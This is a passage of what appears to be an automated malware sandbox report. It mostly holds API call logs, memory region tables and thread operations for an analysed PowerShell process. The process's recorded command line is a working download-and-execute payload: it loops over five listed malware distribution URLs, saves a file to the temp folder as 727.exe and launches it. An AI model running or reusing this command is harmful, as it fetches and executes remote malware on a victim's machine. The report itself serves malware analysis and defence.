1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
|
For performance reasons, the remaining 1388 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Process #3: powershell.exe
442
59
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell $aVV=new-object Net.WebClient;$JEs='http://vdtogt.nl/amyQ@http://viciousenterprises.com/qXUuXq@http://unclebudspice.com/80d@http://valiunas.com/G8CooI@http://thesilveramericaneagle.com/tb'.Split('@');$WXE = '727';$RWi=$env:temp+'\'+$WXE+'.exe';foreach($nqZ in $JEs){try{$aVV.DownloadFile($nqZ, $RWi);Start-Process $RWi;break;}catch{}} |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:03, Reason: Child Process |
| Unmonitor | End Time: 00:01:34, Reason: Self Terminated |
| Monitor Duration | 00:00:31 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa54 |
| Parent PID | 0xa34 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A58
0x
A5C
0x
A60
0x
A64
0x
A68
0x
A6C
0x
A70
0x
AE8
0x
AF0
0x
AF4
0x
BCC
0x
BE4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x000f0000 | 0x000f2fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00110fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00130fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00141fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00257fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00260fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00271fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x00280000 | 0x00283fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db | 0x00290000 | 0x002affff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x002c0000 | 0x002c3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x004d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x010dffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000010e0000 | 0x010e0000 | 0x011befff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000011c0000 | 0x011c0000 | 0x011c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000011d0000 | 0x011d0000 | 0x011d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000011e0000 | 0x011e0000 | 0x011effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000011f0000 | 0x011f0000 | 0x012effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000012f0000 | 0x012f0000 | 0x012f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001300000 | 0x01300000 | 0x0133ffff | Private Memory | rwx |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db | 0x01340000 | 0x0136ffff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01370000 | 0x013d5fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000013e0000 | 0x013e0000 | 0x0141ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001420000 | 0x01420000 | 0x0142ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001430000 | 0x01430000 | 0x0143ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001440000 | 0x01440000 | 0x0144ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001450000 | 0x01450000 | 0x0145ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001460000 | 0x01460000 | 0x0146ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001470000 | 0x01470000 | 0x014affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000014b0000 | 0x014b0000 | 0x014bffff | Private Memory | - |
|
|
|
- |
| private_0x00000000014c0000 | 0x014c0000 | 0x014fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001500000 | 0x01500000 | 0x0150ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001510000 | 0x01510000 | 0x0154ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01550000 | 0x0181efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001820000 | 0x01820000 | 0x01c12fff | Pagefile Backed Memory | r |
|
|
|
- |
| l_intl.nls | 0x01c20000 | 0x01c22fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001c30000 | 0x01c30000 | 0x01c30fff | Private Memory | rw |
|
|
|
- |
| sorttbls.nlp | 0x01c40000 | 0x01c44fff | Memory Mapped File | r |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x01c50000 | 0x01c57fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001c60000 | 0x01c60000 | 0x01c60fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c70000 | 0x01c70000 | 0x01c70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001c70000 | 0x01c70000 | 0x01c7ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001c80000 | 0x01c80000 | 0x01cbffff | Private Memory | rw |
|
|
|
- |
| sortkey.nlp | 0x01cc0000 | 0x01d00fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001d10000 | 0x01d10000 | 0x01d20fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001d30000 | 0x01d30000 | 0x01d3ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001d40000 | 0x01d40000 | 0x01d7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d80000 | 0x01d80000 | 0x01e1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e20000 | 0x01e20000 | 0x01e5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e60000 | 0x01e60000 | 0x01e6ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001e70000 | 0x01e70000 | 0x01e7ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x01e80000 | 0x01f3ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000001f40000 | 0x01f40000 | 0x01f4ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001f50000 | 0x01f50000 | 0x01f8ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000001f90000 | 0x01f90000 | 0x03f8ffff | Private Memory | rw |
|
|
|
- |
| system.management.automation.dll | 0x03f90000 | 0x04271fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.dll | 0x04280000 | 0x042c2fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorrc.dll | 0x042d0000 | 0x04323fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004330000 | 0x04330000 | 0x0433ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000004340000 | 0x04340000 | 0x0434ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000004350000 | 0x04350000 | 0x0435ffff | Private Memory | - |
|
|
|
- |
| powershell.exe | 0x21ca0000 | 0x21d11fff | Memory Mapped File | rwx |
|
|
|
- |
| culture.dll | 0x60340000 | 0x60347fff | Memory Mapped File | rwx |
|
|
|
- |
| system.directoryservices.ni.dll | 0x60c30000 | 0x60d43fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.ni.dll | 0x60d50000 | 0x60e53fff | Memory Mapped File | rwx |
|
|
|
- |
| system.xml.ni.dll | 0x60e60000 | 0x61395fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x613a0000 | 0x6153dfff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x61540000 | 0x61774fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x61780000 | 0x61ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x62000000 | 0x6279bfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x627a0000 | 0x63297fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x632a0000 | 0x6384afff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x64d20000 | 0x64de2fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.dll | 0x64df0000 | 0x650d1fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x66300000 | 0x6639bfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x666b0000 | 0x66734fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x66c10000 | 0x66c3cfff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.dll | 0x67aa0000 | 0x67ae2fff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x6e380000 | 0x6e3a4fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x6e3b0000 | 0x6e3fafff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x6e400000 | 0x6e480fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x6e490000 | 0x6e52afff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x70870000 | 0x70878fff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x70880000 | 0x708adfff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x70980000 | 0x709f9fff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x70d20000 | 0x70d8ffff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x70d90000 | 0x70d9afff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x72130000 | 0x7217bfff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x727a0000 | 0x727e9fff | Memory Mapped File | rwx |
|
|
|
- |
| shfolder.dll | 0x727f0000 | 0x727f4fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x73d50000 | 0x73d59fff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x73d80000 | 0x73d93fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x740e0000 | 0x74100fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x747f0000 | 0x7482ffff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74830000 | 0x74924fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74970000 | 0x74b0dfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74ee0000 | 0x74ee8fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x75040000 | 0x75056fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x75200000 | 0x7523afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75460000 | 0x75475fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x75830000 | 0x75848fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x758e0000 | 0x758ebfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75990000 | 0x7599afff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x75a60000 | 0x75a86fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75bb0000 | 0x75bc1fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75c90000 | 0x75d2ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x75e00000 | 0x75e82fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75fd0000 | 0x75fe8fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x75ff0000 | 0x76034fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x760f0000 | 0x76d39fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76dc0000 | 0x76f5cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x77360000 | 0x773eefff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x773f0000 | 0x77490fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x774a0000 | 0x774f6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77500000 | 0x7765bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77760000 | 0x77833fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77840000 | 0x7797bfff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77980000 | 0x77984fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x779a0000 | 0x779befff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77a80000 | 0x77a80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 63 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Threads
Thread 0xa58
277
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| User | Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
